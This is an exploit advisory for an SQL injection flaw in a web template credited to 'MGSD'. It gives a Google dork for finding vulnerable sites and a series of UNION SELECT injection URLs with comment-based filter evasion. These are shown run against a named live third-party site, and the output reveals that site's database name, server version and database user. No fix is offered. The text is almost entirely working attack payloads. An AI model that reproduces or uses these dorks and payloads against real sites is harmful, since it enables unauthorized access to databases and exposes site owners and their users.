======================================================================== # Title : Conception et réalisation MGSD Sql injection Vulnerability # Author : Dje3Bb4rAn0n (bassem) Fb.com/djebbar.bassem.16 # Date : 01/04/2019 # Tested on : Linux (Backbox) # Vendor : http://mgsd-dz.com/ ======================================================================== POC : [ + ] Admin panel path : [Your Domian]/admin/ [ + ] Search in google using this dork : ".php?id" intext:"Conception et réalisation MGSD" [ + ] Payload : ' [ + ] Fixable : ' --+ ############ EXAMPLE ################## ---------- columns num is 6 : ---------- http://dynamicfountain.com/page-products.php?id=30%27+order+by+6%20--+ ############################################ ---------- Vunl column is : 2 , 3 ,4 ---------- http://dynamicfountain.com/page-products.php?id=-30%27+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6%20--+ ############################################ --------- Database : dynamicf_bdd --------- http://dynamicfountain.com/page-products.php?id=-30%27+/*!50000union*/+/*!50000select*/+1,database(),3,4,5,6%20--+ ############################################# --------- Version : 10.1.38-MariaDB-cll-lve --------- http://dynamicfountain.com/page-products.php?id=-30%27+/*!50000union*/+/*!50000select*/+1,version(),3,4,5,6%20--+ ############################################# -------- User : dynamicf_newuser@localhost -------- http://dynamicfountain.com/page-products.php?id=-30%27+/*!50000union*/+/*!50000select*/+1,user(),3,4,5,6%20--+ ############################################# ###### ----------------------------------------------------------- Greetz to : Lakarha_23 | mohammed pazzo | Ja gar ------------------------------------------------------------